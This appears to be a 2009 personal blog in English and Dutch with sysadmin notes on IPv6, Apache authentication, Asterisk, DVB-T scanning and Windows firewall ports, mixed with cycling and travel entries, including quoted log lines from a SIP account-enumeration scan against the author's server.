Free ups test! It seems the power company decided not to deliver at all for 9 minutes. Interesting is that they don't mention a failure on their own website.

Good Piled Higher & Deeper Comic today:
If TV Science was more like REAL Science Just remember it is TV science. I'll save the rant about police wanting investigating powers like those on TV for a later time.

Wardriving results 14 March - 6 April: 4066 new networks with GPS locations. Still at 16 in the WiGLE stats.

Vandaag "project fiets" uitgevoerd: we zijn van huis naar Brunssum gefietst met onze ligfietsen: totaal 182 kilometer. Iets meer dan 20 kilometer per uur gemiddeld volgens de tellers. Een hele dag fietsen dus. Het voelt erg goed om het een keer gedaan te hebben. Morgen terug.. per trein. Onderweg zijn we natuurlijk ingehaald door de nodige racefietsers (koersers?) maar die hebben allemaal fietsen die ik met een hand kan optillen, dus die mogen harder. Het weer werkte redelijk mee: droog, niet teveel zon, wind meestal in een redelijke hoek. Vooral langs de Zuid-Willemsvaart was een rechte lijn doorfietsen, dat schiet behoorlijk op.

Commentaar Here's proof. The innocent do have something to fear / Simon Jenkins - The Guardian (engelstalig) over een kwestie waarin MP (Member of Parliament, vergelijkbaar met een kamerlid) Jacqui Smith die altijd erg voor het verzamelen van gegevens over burgers is, met natuurlijk het bekende argument dat mensen die niet schuldig zijn niets te verbergen hebben. Toen declaraties door Jacqui Smith onderzocht werden dook een rekening op voor 5 pay-per-view films, waarvan 2 porno films. Mooi commentaar: Hoe vaak zal Jacqui Smith niet te horen gekregen hebben dat een of andere 'oplossing' voor data-opslag door de overheid 'totaal veilig' zou zijn.
Ik kan haast niet wachten tot een Nederlandse politicus die altijd roept over bewaarplicht een vergelijkbare actie uithaalt.

I got curious about querying 'pagerank' and found a nice php source: Finding Google PageRank of a website using PHP. So I duplicated that for my own amusement: Google PageRank checker. Works like a charm.

I found this funny in a dvb service scan in Utrecht:

0x0000 0x0072: pmt_pid 0x0474 Digitenne -- Geen service (running, scrambled)

Translation: Geen service = no service. But it is running and scrambled. It is the old slot of 'BemBem' kids radio which seems to have stopped.

From time to time it annoyed me that the double-click selection in XTerm/UXTerm on the Ubuntu desktop differed from what I was used to before: 1 click is a letter, 2 clicks is a word, 3 clicks is a line. The definition of 'word' seemed to differ a lot with mine, I want to be able to select parts separated by @ and : characters. Inspired by xterm Regex Matching for Cut Selection by Sean ReifschneiderI tried with 'regex' but that did not work as I wanted, because extending a selection fails unexpectedly in that mode. Solution: updating the definition of a 'word' by modifying the XTerm*charClass. My current settings:

XTerm*on4Clicks: line
XTerm*on3Clicks: regex [^	 \n]+
XTerm*on2Clicks: word
XTerm*charClass:

That's a tab in the regex: now I can use triple-click to select a url, e-mail address or something likewise all at once, and double-click selects a word in the way I like it. Duplicated for class UXTerm.

Lesson learned today: certain dell rackmount servers signal loss of power in one power supply by running the cooling fans at maximum speed. The power supply in the most unreachable corner of the rack. And finding the source of the noise is hard when you have a rack full of them ("Somewhere in the area of adonis..").
And here I was looking for the airflow obstruction I created when changing some kvm cables.

With IPv6 I have enough address space to select a 'nicer looking' address on outgoing connections from home server greenblatt. The assigned endpoint, 2001:888:10:11::2 resolves to tunnel17.ipv6.xs4all.nl which is an ok name, but something of my own is better. So, I have set up /etc/network/interfaces to add another address of my own and use this as source in outgoing traffic:

iface xs4allipv6 inet6 v4tunnel
    endpoint 194.109.5.241
    address 2001:888:10:11::2
    netmask 64
    up ip tunnel change xs4allipv6 ttl 64
    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6
    up ip -6 route add unreachable 2001:888:1011::/48
    up ip -6 route add default via 2001:888:10:11::1 src 2001:888:1011::13
    down ip -6 route del unreachable 2001:888:1011::/48

I add the address I prefer, 2001:888:1011::13 with such a netmask that it doesn't clash with the fact that address is part of the range on the wired network at home and I add a default route using that as source. 2001:888:1011::13 resolves to outgate.idefix.net

This works... except when I visit addresses in the xs4all IPv6 IP space (my best guess: in the same /32). This must be an artifact of the IPv6 source address selection policy, but I can't find the way to manipulate this policy. It seems to be related to Linux 2.6.recent.
Update : I learned from Jeroen Schot that the address selection is an implementation of RFC 3484, explaned in RFC 3484 on Linux by Ulrich Drepper. The destination address choice is configured in /etc/gai.conf, for as far as I can see gai.conf is mostly destination selection, the source is a kernel matter.
Update 2009-11-18 : Solution found: working IPv6 source address selection the way I want it.

Neat: a webbot via ipv6!
2001:da8:7007:100:20f:1fff:fe6d:c250 - - [29/Mar/2009:12:33:08 +0200] "GET /robots.txt HTTP/1.1" 200 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
Doesn't really identify itself as a bot but it requests pages at such a rate that it must be an automated script.

Just seen in the Slashdot RSS feed.. An advertisment which does not look that relevant to slashdot or to the story Graphic Artists Condemn UK Ban On Erotic Comics : Dating for seniors
I'm not going to make the joke about carbon dating.

I noticed a few malformed characters in the RSS feed of my homepage that weren't there in the original database entries and showed ok in the web version. Again, utf-8 problems showing, although all data (postgres - script - xml - browser) should be utf-8. Lots of testing and searching, finally I found The Perl UTF-8 and utf8 Encoding Mess by Jeremy Zawodny. He is right: it is a mess. And the post itself demonstrates it by being filled with � characters.
So to make sure everything in the RSS generating process understand that what comes out of PostgreSQL is valid utf-8 and should be imported in the XML::RSS module as the same valid utf-8, I need to recode it to utf-8. Uh.. ok. The bit of code:

        my $body = Encode::decode('UTF-8', $row[1]);

And now I can use ÜTF-8 çħáräćtërs!

I had trouble reaching the other end of my Hurricane Electric IPv6 tunnel so I mailed the support address telling them about the issue I saw in routing. Within minutes I had a reply that an engineer was looking into the matter and that it would be up and running again within an hour.

Lots of paid Internet services will take longer to acknowledge and fix a problem. Kudos to Hurricane Electric for offering IPv6 connectivity for free with such a high level of support.

The tale of Trying to set up a windows domain controller behind a firewall continues: the server at the receiving side runs Windows server 2008 and has a whole new idea of dynamic port numbers for RPC services. Although it is documented as port numbers for 'outgoing connections' in The default dynamic port range for TCP/IP has changed in Windows Vista and in Windows Server 2008, we see them used and negotiated for incoming connections. An explanation is in this technet article: Dynamic Client Ports in Windows Server 2008 and Windows Vista (or: How I learned to stop worrying and love the IANA) although I would call the use of the term 'client ports' confusing because processes are be listening on those ports. From that server:

  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49158          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49163          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49164          0.0.0.0:0              LISTENING

So the Microsoft documentation is broken. No thanks for that.
Update: A somewhat better explanation at How to configure a firewall for domains and trusts where indeed the entire range 49152 - 65535 range can be used for RPC and should be configured in the firewall.

I like my home server usually boring and stable, but virus prevention should be at the bleeding edge, especially when it handles mail for multiple domains where other people can receive it. So I don't like messages in the clamav logfile:

WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.92.1 Recommended version: 0.95

Using the Ubuntu backports I was able to get a less older version of clamav running. I updated the home server greenblatt documentation with the exact details of just using the clamav backport and no other backports.

'Internetgebruiker moet beter beschermd worden' - nu.nl/Internet met een voorstel:

De Europese Commissie moet snel met wetgeving komen om internetgebruikers beter te beschermen. Nieuwe wetgeving moet aantasting van de persoonlijke levenssfeer door bedrijven en overheden tegengaan.

Mijn voorstel: ga eens praten met de mensen in het Europese parlement die over de bewaarplicht gaan, een serieuze aantasting van de persoonlijke levenssfeer door overheden.

Lots of unreadable news about the Conficker/Downadup worm, including the first 'end of the Internet predicted' articles. For a quite readable explanation, go read Downad/Conficker, who’s the April Fool? by Rik Ferguson from Trend Micro and for a more scientific dissection go read An Analysis of Conficker by Phillip Porras, Hassen Saidi, and Vinod Yegneswaran at SRI International.
Source: Final countdown to Conficker 'activation' begins - The Register.

Apache the webserver can be configured to use multiple authentication servers to find the one that knows a given user. We needed this for our new subversion server and it took me some searching to find the right way to configure it. It is one of those 'easy when you know it' items. We want our new subversion server to allow all our normal (ldap) users access and a set of guest users. There will always be guest users for projects hosted with us. The relevant part of the Apache documentation Authentication, Authorization and Access Control - Apache HTTP server isn't very clear on using multiple authentication sources but Apache Module mod_authn_alias shows that it is possible and a nice way to make readable authentication configurations using multiple sources. The AuthnProviderAlias needs to be in the global configuration so I created /etc/apache2/conf.d/authconfig with:

# the general authorization config

<AuthnProviderAlias dbm svnlocal>
    AuthDBMUserFile /etc/apache2/subversion/guestusers
    AuthDBMType DB
</AuthnProviderAlias>

<AuthnProviderAlias ldap svnldap>
    AuthLDAPURL ldap://ldap.cs.uu.nl:389/dc=cs,dc=uu,dc=nl?uid
</AuthnProviderAlias>

And now to use these for SVN access:

# the subversion access config
<Location /repos>
    DAV svn
    SVNParentPath /data/svn/repos

    # our access control policy
    AuthzSVNAccessFile /etc/apache2/subversion/svnaccessfile

    # try anonymous access first, resort to real
    # authentication if necessary
    Satisfy Any
    Require valid-user

    # how to authenticate a user
    AuthType Basic
    AuthName "Subversion repository"

    AuthBasicProvider svnlocal svnldap
</Location>

The Satisfy Any is because we do have repositories with full public access. The choice of first checking local users and then checking ldap users is because the number of local users should be limited and the ldap server should not be overloaded with traffic. The complete access rules are set up in the AuthzSVNAccessFile which is documented in the SVN book, httpd, the Apache HTTP Server - Server Configuration SVN

Pub is closed by Monty Python grenade - Evening Standard You can't make this stuff up: a 'suspicious object' turned out to be the original Holy Hand Grenade of Antioch from the Monty Python movie Monty Python and the Holy Grail (1975).
Via Holy Hand Grenade of Antioch Bomb Scare - Schneier on Security.

Van de volkskrant site, een [link verlopen] video over de Land Rover Defender Als ik dat zo zie blijf ik er bij dat de Land Rover Discovery meer mijn keuze zou zijn als ik er veel geld voor beschikbaar had en te maken had met het soort weg en terrein waar zo'n soort auto zin heeft. Voor de aardigheid, een promotievideo voor de Landrover Discovery er bij:

The Virtual Bookcase is back online too, and mail is flowing again for all the domains. Lots of typing, checking and everything to move the stuff to the home server. But, finished (I think).
Update: and all the web statistics are working again and updated. Finished?

I took the old powersupply from v4.idefix.net outside and opened it there. In that order, because of the smell. Maybe capacitor problems have been involved in the untimely end of this power supply too. Anyway, that one is not going to work anymore!

The old powersupply

The old powersupply, details of the damage on the inside

The good news after all the work to get my homepage reachable again is of course:

koos@greenblatt:~$ host idefix.net
idefix.net has address 82.95.196.202
idefix.net has IPv6 address 2001:888:1011::694
idefix.net mail is handled by 10 postbox.idefix.net.

My homepage is now reachable over IPv6!

And it is back! Idefix 4 broke in a major way: the power supply let out the magic smoke in a big way: the hosting company called me to let me know the server was smelling funny and did not want to start up at all. Since the end of idefix 4 in a rack was near anyway the decision was made to move the server home. There I used another power supply to get access to my data again. The old powersupply was a 300 Watt powersupply which seems to be way underrated for a dual Xeon system. My best guess is that the instability the system had came from the powersupply anyway. So, time to move more domains home. Content from idefix.net is now here at home and virtualbookcase will be next when I find time. I had started migrating Camp Wireless so I finished that migration fast. Mail is diverted to a different place so I have a bit of time to configure all the mailing lists and other things.

Wardriving results 5 February - 13 March: 2692 new networks with GPS locations. Not much wardriving happening in this time due to holidays and busy times.

Jason Scott writes about the end of the Computer shopper magazine. One thing he notes are the big listings of BBS numbers in the small classified ads. An amazing amount of BBS history and related information is hidden in those ads.

Computer Shopper, December 1987, BBS ads

Computer Shopper, December 1987, BBS ads detail

One sample:

(714)688-3204 Riverside. Baud:
3/12/24, online: 24hrs. (disk
space = 160mb) SysOp: Richard
Adkins. ATARI ONLY BBS. For
Supporting Atari-St and Atari
8 bit computers.

Ah, back when the world was divided into Atari, Amiga, Commodore 64 and other camps. Interesting is that the phone number (714)688-3204 shows up in searches with different bbs names: "The Widowmaker" (December 1991), "R.A.C.E. BBS" (undated), "Starlink Line 1" (September 1991), "Starlink" (August 1992).

Trying to set up a windows domain controller behind a firewall we run into a weird error message:

DNS was successfully queried for the service location (SRV) resource
record used to locate a domain controller for domain
zandbak.students.cs.uu.nl:


The query was for the SRV record for
_ldap._tcp.dc._msdcs.zandbak.students.cs.uu.nl
  
The following domain controllers were identified by the query: 
  
BROADCAST.zandbak.students.cs.uu.nl

Common causes of this error include:
  
- Host (A) records that map the name of the domain controller to its IP
addresses are missing or contain incorrect addresses.

- Domain controllers registered in DNS are not connected to the network
or are not running.

Query successful and these are the common sources of this error. What?
Anyway, after some searching I dig out wireshark to look what is happening. And the query SRV? _ldap._tcp.dc._msdcs.zandbak.students.cs.uu.nl. and answer is followed by traffic to port 389/udp. Right. Anyway, the hopefully correct firewall setup is documented by Microsoft: How to configure Windows Server 2003 SP1 firewall for a Domain Controller.
Again, one of the cases where the actual error and the reported error message differ.

I got interested in the Collectors' Net, a network of people interested in old telephone equipment, who at one time got the idea of hooking them together using asterisk and voip links. I don't have any old telephone equipment to make available to the C*net members, but I do have some Asterisk projects for them to enjoy. So, I signed up and programmed my asterisk to route calls to the 0149- area code (A reserved area code in the Netherlands) out via C*Net after some massaging (C*Net uses enum to link the asterisk servers directly).

Some long-planned garden work today: I pruned the apple tree. Having the tree almost lose branches under the weight of the apples last year and having part of the apples hanging way to high made me decide to seriously prune it before spring really starts. Quite some work. I hope the tree will do better this year. And we have a bigger load of firewood now. I hope this summer will have some evenings to deal with the previous load of firewood.

Oh and in Paris I did bring my laptop and the dvb-t stick. Tried a scan, and found 5 bouquets with in total 29 services (18 free-to-air). Some services with 'HD' in the name, which mplayer could not play. I also saw some multilingual services. Free-to-air services seen by w_scan: Canal 21(Multi-7), IDF1(Multi-7), NRJ Paris(Multi-7), CAP 24(Multi-7), M6(MULTI4), W9(MULTI4), NT1(MULTI4), PARIS PREMIERE(MULTI4), ARTE HD(Multi 4), CANAL+(CNH), TPS STAR(CNH), CANAL+ SPORT(CNH), TF1 HD(MR5), France 2 HD(MR5), M6HD(MR5), TF1(SMR6), NRJ12(SMR6), TMC(SMR6).

I updated my homepage so it automatically incorporates my tweets. I notice I use different styles on twitter and here, probably having a lot to do with the 140 character limit at Twitter, but in the end it can be mixed anyway.

I'm in Paris at the Alcatel-Lucent Enterprise Forum. Lots of presentations about the future of IP telephony, how to save money with IP telephony in the current financial climate and lots of future visions involving UC (Unified Communications). Even realistic ones where people want to look at the organization first before deciding wheather UC is a good idea to spend money on.
Last year I was at the 2008 edition and an analyst told that TDM (digital intracompany telephony) had no future left. This year it isn't even mentioned anymore. IP telephony is the future and there is a move from proprietary protocols to SIP. One standard, pick the SIP PBX that does best what you want and pick the SIP phones that do what you want. For standard features (calling and being called) any standard SIP phone is good enough.
The conference center has wireless network for the forum guests with limited access: only port 80 and 443 seem to work. Good thing xs4all runs sshd on port 80 on the shell servers so I can still get somewhere and use my screens. My tip now for Internet access for road-warriors: bring a 2 meter UTP cable too. Wifi may be everywhere, but our hotel (Hotel California in Paris, makes me wonder how hard it will be to leave) offers free Internet access when you bring your own utp cable.

I'm typing this while sitting in the Thalys high-speed train between Antwerp and Brussels (so no 300 km/h yet). The first class has free wi-fi Internet access. I had to lower the mtu of the wireless interface to be able to use ssh and screen to access my normal home environment, so path mtu discovery is probably b0rken somewhere. I appear from a Belgian IP, no idea how they do the uplink from the train.
Update 2009-03-06: Found on the Thalys website: WiFi - Internet access for everyone! with an explanation how satellite Internet and UMTS/GPRS are used to tunnel the Internet to the train. The whole tunneling thing is probably what is causing the mtu problem.

I made my own lolcat: Tender was sleeping on the couch near the laptop charger. I first tried to setup a picture but she was annoyed at my attempts to put the cable near her but 5 minutes later she went to sleep again. Recharging: 95% complete.

Back from a week in ... Egypt. A gift from Mirjam's parents. We saw Cairo, the pyramids, El Fayoum and Alexandria. It's an amazing feeling to visit 5000 year old man-made constructions. At the same time Egypt now is a very chaotic country with noise everywhere. For the first time I found Dutch traffic calm compared to what I had seen. Especially in Alexandria you constantly hear car horns.

Lots of security theatre ofcourse, but seeing 3 man militairy police (Koninklijke Marrechaussee) on Schiphol airport with automatic weapons was more shocking than seeing truckloads of police and soldiers with automatic weapons in Egypt. I sort-of expect it in Egypt (although the travel brochures downplay it a bit). The Egyptian 'tourist police' is everywhere and most places where tourists come are guarded. Metal detectors everywhere beeping but most of the time the beeping is ignored by the guards.

I could have done with less adventure: first one of our bags went missing on the flight to Egypt. Nothing really important in the bag but irritating. Then on Sunday evening we went walking in Cairo and found a police cordon in the area we wanted to visit. We had dinner in a restaurant near the cordon but it had moved a few streets back when we left the restaurant so all the international press was gathered and tried to get a statement from the obviously European tourists leaving the area. But we had no idea at that time what happened. Some of the group asked the reporters what happened and got a bit of idea: a bomb attack. Friends back in the Netherlands alerted us to the fact that we were on TV tuesday morning. I looked quite lost, which was exactly what I felt like at that time. And only when we arrived home and browsed the newspapers we noticed that an airplane had crashed near Schiphol during the week.

I got reminded of my Alcatel stats again and some google searches and some combining of clues (the logical place would be in the 'td call' command) led me to the right answer at DMTv7 für Speedtouch 516 536 546 585 608 706 716 780 to get the dsl linestats from a Speedtouch 546/546i: :td call cmd="tdsl getData all". Trying it:

*              ____/
*
------------------------------------------------------------------------
=>:td call cmd="tdsl getData all"

=====================DISCLAIMER======================
 Access to expert commands is intended for qualified 
 personnel only.                                     
==================END=OF=DISCLAIMER==================

Vendor Information
   phyType=2  phyMjVerNum=4  phyMnVerNum=0 
   phyVerStr=B2pBT004.d15b 
   drvMjVerNum=14  drvMnVerNum=20482 
   drvVerStr=15b 

And suddenly lots of data including the signal/noise ratio per carrier. So after stopping gathering Alcatel Speedtouch graphs in 2005 because I switched to a Speedtouch 546i I can now gather the stats again and create the graphs daily. In the mean time gnuplot changed a bit but with some tweaking of the plotscript I now have the first S/N graph of the 546i as I want it.

Vandaag zou het geen fietsweer worden dus was ik maar begonnen aan een project waar de onderdelen al even voor klaar lagen: de binnenbanden en buitenbanden van mijn ligfiets vernieuwen en de ketting schoonmaken. De buitenbanden hadden toch al naar schatting 7000 kilometer afgelegd, dus een keer vervangen was wel nuttig. Op de Nazca Pioneer zaten al Schwalbe Marathon banden, die zijn prima bevallen en dus heb ik weer gekozen voor deze banden. De overweging was nog even of de Marathon plus een keuze was, deze is nog lekbestendiger, maar de afweging extra lekbestendigheid versus rolweerstand kwam toch uit op 'niet meer rolweerstand'. Bij het er op leggen van banden heb ik altijd wat moeite om ze ervan te overtuigen dat 'rond' de ideale vorm is, meestal blijven er toch lichte hobbels achter ondanks duwen en trekken. Deze keer heb ik de methode 'gelijk terdege oppompen' geprobeerd en ergens bij 6 bar schoten zowel voor- als achterband in de goede ronde vorm. Maximum voor deze banden is 7 bar en daar ben ik voor gegaan.
Daarnaast heb ik de ketting eens schoongemaakt. Doordat ik de afgelopen tijd een paar keer door de regen had gefietst en niet direct de ketting schoongemaakt was deze nogal gaan roesten wat de snelheid ook niet ten goede kwam. De ketting heeft een nacht in een badje diesel gelegen en daarmee is de nodige rommel er uit gekomen. Ik heb nu ook de truukjes van de sluitschakel geleerd. Ik kan nu dus weer een pot vooruit, op volle snelheid.
Update 2009-02-16: Ja het werkt, gemiddelde snelheid naar mijn werk vanmorgen 23.94 kilometer per uur.

It being Friday afternoon I fired up vlc to see if there were any interesting announcements of multicast streams. And yet another university, this time one in the UK was leaking their entire TV program lineup (all UK terrestrial programs, which is quite a list). I tried the programs but nothing worked until I tried the last one: BBC HD. This one does work, giving over 20 megabit of video in HD. Screenshot of the BBC HD logo animation (1600x1080px)

After the attack I saw on an asterisk server which was most likely scanning for valid user accounts to use in international dialing I am wondering if I can 'play' with users who try to abuse an asterisk setup.

For the hcc!pc gg netwerkgroep demo asterisk I scripted a sort of teaser for users trying to dial abroad:

[internationaltrick]
; not really dial an international number: play an interesting 'wrong number'

exten => _00XXXXXXXXXX.,1,Wait(5)
exten => _00XXXXXXXXXX.,n,Goto(wrongnumber,s,1)

The delay is to add confusion to how many digits it accepts (although someone using 'early dialing' could see when asterisk reports back it has seen enough digits). What the wrongnumber routine does is play a random 'wrong number' recording taken from Telephone world - International sounds & recordings so someone who tries this who is actually listening to call progress might think he is on to something and spend hours trying to find the right way.

In verband met de nog ietwat lastige ribben en het vervelende weer was ik vanmorgen met de auto. Helaas vond de politie het nodig om op een van de drukste plekken op de route een uitgebreide controle te houden tijdens de ochtendspits: op de Sartreweg was in zuidelijke richting maar 1 rijbaan beschikbaar waardoor het verkeer enorm vastliep op de Kardinaal de Jongweg en de Biltse Rading, kaart op OpenStreetMap. Zo'n controle heb ik wel eens vaker gezien op dinsdag, ik gok dat er een verband is met de automarkt. Alleen is het knap vervelend dat de vertraging in de ochtendspits enorm toeneemt door zo'n controle.

I used the recumbent bicycle today to get to work. After the little snowboarding mishap I used the car last week but today I wanted to bicycle again as Dutch traffic is busy and I miss the exercise when I'm not bicycling. I did notice I do use muscles in the bruised area when bicycling: especially making speed was a bit painfull.

Another scan of the vhf/uhf spectrum in Brunssum, and this time I got lucky and found the VRT dvb-t bouquet at 506 MHz (UHF 25) from Genk. With scan:

scanning /usr/share/doc/dvb-utils/examples/scan/dvb-t/be-Genk
using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0'
initial transponder 506000000 0 1 9 3 1 3 0
>>> tune to: 506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
0x0000 0x1090: pmt_pid 0x1090 VRT -- Klara continuo (running)
0x0000 0x1080: pmt_pid 0x1080 VRT -- MNM (running)
0x0000 0x1070: pmt_pid 0x1070 VRT -- Studio Brussel (running)
0x0000 0x1060: pmt_pid 0x1060 VRT -- Klara (running)
0x0000 0x1040: pmt_pid 0x1040 VRT -- Radio 1 (running)
0x0000 0x1050: pmt_pid 0x1050 VRT -- Radio 2 (running)
0x0000 0x1010: pmt_pid 0x1010 VRT -- EEN (running)
0x0000 0x1020: pmt_pid 0x1020 VRT -- Canvas/Ketnet (running)
0x0000 0x10b0: pmt_pid 0x10b0 VRT -- Canvas+/Ketnet+ (running)
0x0000 0x10a0: pmt_pid 0x10a0 VRT -- Sporza (running)
0x0000 0x10c0: pmt_pid 0x10c0 VRT -- Nieuws+ (running)
0x0000 0x10d0: pmt_pid 0x10d0 VRT -- MNM hits (running)
Network Name 'VRTmux1'
>>> tune to: 482000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
WARNING: >>> tuning failed!!!
>>> tune to: 482000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE (tuning failed)
WARNING: >>> tuning failed!!!
dumping lists (12 services)
Klara continuo:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4241:4240
MNM:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4225:4224
Studio Brussel:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4209:4208
Klara:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4193:4192
Radio 1:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4161:4160
Radio 2:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4177:4176
EEN:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4113:4114:4112
Canvas/Ketnet:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4129:4130:4128
Canvas+/Ketnet+:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4273:4274:4272
Sporza:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4257:4256
Nieuws+:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4289:4288
MNM hits:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4305:4304

In the evening reception was ok, during the day lots of errors. I guess an outside antenna with preamp could make this usable. I updated the DVB experiments with the new data. This brings the total listing of free-to-air services found in this place to 24 television and 24 radio stations. The tuning to 482 MHz is because that is the other VRTmux1 frequency.

High level of friday afternoon in this one: Microsoft research came up with songsmith software and 'promotes' it with a very very cheesy video (notice the brand of the laptop?). Songsmith is software to add music to signing. What people started doing is taking voice tracks from existing music and letting songsmith add new music, leading to the most interesting ways to make you cringe: We Will Rock You - Queen versus Songsmith, "Beat It" by Michael Jackson, and a metal rickroll just to be sure.

Recently I was busy configuring the home asterisk server and I used a softphone to test connected to the demo server I run for several asterisk projects. It all started to work, I could leave voicemail, retrieve voicemail, delete voicemail. Great. Because I was debugging stuff, I had several asterisk consoles open to view messages about my tests.

That demo-server is connected to the internet-at-large. The idea is that one can take a sip-client and 'dial' sip:eham@idefix.net and hear the latest weather. So there is an Asterisk context for guest sip callers. It also has a few accounts for other tests.

While working on my stuff I suddenly saw lots of messages on the console of the demo-server. Loads and loads about failed registrations. Constantly flooding messages. Just as I was to going to tcpdump the traffic to save it it stopped: less than 10 minutes.

Log entries from the attack

I'm not going to post all 19511 entries.
First, what seems to be a probe:

Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"613430211"<sip:613430211@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch

Then, possible accounts are enumerated:

Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"0"<sip:0@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"1"<sip:1@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"2"<sip:2@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"3"<sip:3@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"4"<sip:4@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:31 NOTICE[28514] chan_sip.c: Registration from '"5"<sip:5@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch

Running through the numbers:

Feb  3 22:54:32 NOTICE[28514] chan_sip.c: Registration from '"98"<sip:98@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:32 NOTICE[28514] chan_sip.c: Registration from '"99"<sip:99@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:32 NOTICE[28514] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:32 NOTICE[28514] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:54:32 NOTICE[28514] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch

Only giving up at:

Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9993"<sip:9993@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9994"<sip:9994@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9995"<sip:9995@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9996"<sip:9996@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9997"<sip:9997@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9998"<sip:9998@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch
